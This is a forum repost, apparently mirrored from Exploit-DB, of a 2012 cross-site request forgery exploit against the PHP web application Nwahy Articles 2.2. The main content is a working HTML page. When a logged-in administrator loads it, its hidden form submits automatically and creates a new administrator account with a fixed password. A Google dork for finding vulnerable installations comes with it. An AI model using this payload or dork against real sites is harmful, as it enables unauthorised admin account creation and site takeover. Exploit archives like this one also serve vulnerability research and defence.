- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 19927
- Проверка EDB
-
- Пройдено
- Автор
- DAONE
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2012-07-18
Nwahy Articles 2.2 - Cross-Site Request Forgery (Add Admin)
HTML:
##########################################
[~] Exploit Title: Nwahy Articles V2.2 CSRF Add Admin
[~] Author: DaOne
[~] Date: 18-7-2012
[~] Category: webapps
[~] Software Link: http://www.nwahy.com/upload/article-v2.2.rar
[~] Google dork: intext:"Powered by Nwahy Articles V2.2"
##########################################
[#] ~[ Exploit ]~
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://localhost/admincp/user.php?action=insert">
<input type="hidden" name="username" value="webadmin"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="email" value="[email protected]"/>
<input type="hidden" name="site" value="http://www.nwahy.com"/>
<input type="hidden" name="name" value="..."/>
<input type="hidden" name="groubtype" value="1"/>
</form>
</body>
</html>
##########################################- Источник
- www.exploit-db.com
